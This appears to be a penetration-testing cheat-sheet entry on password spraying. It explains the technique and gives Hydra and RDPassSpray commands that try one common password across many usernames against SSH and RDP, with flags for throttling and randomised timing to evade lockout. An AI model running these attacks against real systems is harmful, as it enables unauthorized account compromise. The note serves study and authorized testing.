
Password Spraying

Useful if there is an Account Lockout Policy

Password spraying is an effective technique for identifying valid credentials, and one of the most common password attacks for discovering weak passwords.

This technique can be used against various online services and authentication systems, such as SSH, SMB, RDP, SMTP, and Outlook Web Application. A password spraying attack targets many usernames using one common weak password, which could help avoid triggering an account lockout policy.

:: Example of Password Spraying using Hydra
hydra -L <Username List> -p Pa$$w0rd ssh://<IP>

RDP

If we find an exposed RDP service, we can use a tool such as RDPassSpray to password spray against RDP.

RDPassSpray -U <Username List> -p Pa$$w0rd -t <IP:PORT>

:: [-U] - Users List to use.
:: [-u] - Single Username.
:: [-P] - Password List to use.
:: [-p] - Single Password.
:: [-T] - Targets List to use.
:: [-t] - Target Machine to Authenticate Against.
:: [-d] - Domain Name to Use.
:: [-s] - Throttle the Attempts.
:: [-r] - Randomize the Time between each Authentication Attempt.
:: [-o] - Output to a CSV File.
:: [-V] - Verbose Output.
:: [-n] - Hostnames List to use as the Source Hostnames.